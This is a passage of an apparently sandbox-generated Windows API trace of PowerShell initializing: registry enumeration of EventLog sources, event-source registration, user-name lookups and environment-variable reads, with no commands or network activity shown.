	[0290.126] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.127] CoTaskMemFree (pv=0x447b80) 
	[0290.127] CoTaskMemFree (pv=0x0) 
	[0290.127] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.127] CoTaskMemFree (pv=0x447b80) 
	[0290.127] CoTaskMemFree (pv=0x0) 
	[0290.127] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.127] CoTaskMemFree (pv=0x447b80) 
	[0290.127] CoTaskMemFree (pv=0x0) 
	[0290.127] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x354) returned 0x0
	[0290.127] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.127] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x358) returned 0x0
	[0290.127] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.128] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x35c) returned 0x0
	[0290.128] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.128] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x360) returned 0x0
	[0290.128] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.128] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x364) returned 0x0
	[0290.128] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.128] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x368) returned 0x0
	[0290.128] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x36c) returned 0x0
	[0290.129] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x370) returned 0x0
	[0290.129] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x374) returned 0x0
	[0290.129] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x378) returned 0x0
	[0290.129] RegCloseKey (hKey=0x378) returned 0x0
	[0290.129] RegCloseKey (hKey=0x350) returned 0x0
	[0290.130] RegCloseKey (hKey=0x374) returned 0x0
	[0290.130] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cec8 | out: phkResult=0x20cec8*=0x374) returned 0x0
	[0290.130] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20ce3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20ce3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.131] CoTaskMemFree (pv=0x0) 
	[0290.131] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.131] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.131] CoTaskMemFree (pv=0x447b80) 
	[0290.131] CoTaskMemFree (pv=0x0) 
	[0290.131] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.131] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.131] CoTaskMemFree (pv=0x447b80) 
	[0290.131] CoTaskMemFree (pv=0x0) 
	[0290.131] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.131] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.131] CoTaskMemFree (pv=0x447b80) 
	[0290.131] CoTaskMemFree (pv=0x0) 
	[0290.131] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.131] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.131] CoTaskMemFree (pv=0x447b80) 
	[0290.131] CoTaskMemFree (pv=0x0) 
	[0290.132] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.132] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.132] CoTaskMemFree (pv=0x447b80) 
	[0290.132] CoTaskMemFree (pv=0x0) 
	[0290.132] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.132] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.132] CoTaskMemFree (pv=0x447b80) 
	[0290.132] CoTaskMemFree (pv=0x0) 
	[0290.132] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.132] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.132] CoTaskMemFree (pv=0x447b80) 
	[0290.132] CoTaskMemFree (pv=0x0) 
	[0290.132] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.132] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.133] CoTaskMemFree (pv=0x447b80) 
	[0290.133] CoTaskMemFree (pv=0x0) 
	[0290.133] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.133] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x447b80, lpcchName=0x20cec8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20cec8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.133] CoTaskMemFree (pv=0x447b80) 
	[0290.133] CoTaskMemFree (pv=0x0) 
	[0290.133] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x350) returned 0x0
	[0290.133] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.133] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x378) returned 0x0
	[0290.133] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.133] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x37c) returned 0x0
	[0290.133] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.134] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x380) returned 0x0
	[0290.134] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.134] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x384) returned 0x0
	[0290.134] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.134] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x388) returned 0x0
	[0290.134] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.134] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x38c) returned 0x0
	[0290.134] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.134] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x390) returned 0x0
	[0290.135] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x0) returned 0x2
	[0290.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x394) returned 0x0
	[0290.135] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cf28 | out: phkResult=0x20cf28*=0x398) returned 0x0
	[0290.135] RegCloseKey (hKey=0x398) returned 0x0
	[0290.135] RegCloseKey (hKey=0x374) returned 0x0
	[0290.135] RegCloseKey (hKey=0x394) returned 0x0
	[0290.136] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20ce98 | out: phkResult=0x20ce98*=0x394) returned 0x0
	[0290.136] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20ce0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20ce0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20ce08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.136] CoTaskMemFree (pv=0x0) 
	[0290.137] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.137] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.137] CoTaskMemFree (pv=0x447b80) 
	[0290.137] CoTaskMemFree (pv=0x0) 
	[0290.137] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.137] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.137] CoTaskMemFree (pv=0x447b80) 
	[0290.137] CoTaskMemFree (pv=0x0) 
	[0290.137] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.137] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.137] CoTaskMemFree (pv=0x447b80) 
	[0290.137] CoTaskMemFree (pv=0x0) 
	[0290.137] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.137] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.137] CoTaskMemFree (pv=0x447b80) 
	[0290.137] CoTaskMemFree (pv=0x0) 
	[0290.137] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.137] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.138] CoTaskMemFree (pv=0x447b80) 
	[0290.138] CoTaskMemFree (pv=0x0) 
	[0290.138] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.138] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.138] CoTaskMemFree (pv=0x447b80) 
	[0290.138] CoTaskMemFree (pv=0x0) 
	[0290.138] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.138] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.138] CoTaskMemFree (pv=0x447b80) 
	[0290.138] CoTaskMemFree (pv=0x0) 
	[0290.138] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.138] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.138] CoTaskMemFree (pv=0x447b80) 
	[0290.138] CoTaskMemFree (pv=0x0) 
	[0290.138] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0290.138] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x447b80, lpcchName=0x20ce98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20ce98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.139] CoTaskMemFree (pv=0x447b80) 
	[0290.139] CoTaskMemFree (pv=0x0) 
	[0290.139] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x374) returned 0x0
	[0290.139] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.139] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x398) returned 0x0
	[0290.139] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.139] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x39c) returned 0x0
	[0290.139] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.139] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3a0) returned 0x0
	[0290.140] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.140] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3a4) returned 0x0
	[0290.140] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.140] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3a8) returned 0x0
	[0290.140] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.140] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3ac) returned 0x0
	[0290.140] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.140] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3b0) returned 0x0
	[0290.140] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x0) returned 0x2
	[0290.141] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3b4) returned 0x0
	[0290.141] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cef8 | out: phkResult=0x20cef8*=0x3b8) returned 0x0
	[0290.141] RegCloseKey (hKey=0x3b8) returned 0x0
	[0290.141] RegCloseKey (hKey=0x394) returned 0x0
	[0290.141] RegCloseKey (hKey=0x3b4) returned 0x0
	[0290.146] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b870008
	[0291.017] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x321cc28*="WSMan", lpRawData=0x321c998) returned 1
	[0292.560] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.561] CoTaskMemFree (pv=0x4ae780) 
	[0292.599] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0292.599] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0292.600] CoTaskMemFree (pv=0x1b78cc80) 
	[0292.600] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0292.600] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0292.601] CoTaskMemFree (pv=0x447b80) 
	[0292.601] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d0c5a0*="Alias", lpRawData=0x2d0c330) returned 1
	[0292.654] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.654] CoTaskMemFree (pv=0x4ae780) 
	[0292.655] CoTaskMemAlloc (cb=0x804) returned 0x1b78cc80
	[0292.655] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cc80, nSize=0x20d188 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d188) returned 0x1
	[0292.655] CoTaskMemFree (pv=0x1b78cc80) 
	[0292.655] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0292.655] GetUserNameW (in: lpBuffer=0x447b80, pcbBuffer=0x20d1c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d1c8) returned 1
	[0292.656] CoTaskMemFree (pv=0x447b80) 
	[0292.656] ReportEventW (hEventLog=0x1b870008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d11b98*="Environment", lpRawData=0x2d11928) returned 1
	[0292.681] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.681] CoTaskMemFree (pv=0x4ae780) 
	[0292.682] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.682] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0292.682] CoTaskMemFree (pv=0x4ae780) 
	[0292.682] CoTaskMemAlloc (cb=0x104) returned 0x4ae780
	[0292.682] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x4ae780, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0292.682] CoTaskMemFree (pv=0x4ae780) 
	[0292.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x20cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0292.682] SetErrorMode (uMode=0x1) returned 0x1
	[0292.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x20cf40 | out: lpFileInformation=0x20cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.683] SetErrorMode (uMode=0x1) returned 0x1
	[0292.684] GetLogicalDrives () returned 0x4
	[0292.684] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.685] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.686] SetErrorMode (uMode=0x1) returned 0x1
	[0292.686] CoTaskMemAlloc (cb=0x68) returned 0x1b786110
	[0292.687] CoTaskMemAlloc (cb=0x68) returned 0x1b785f50
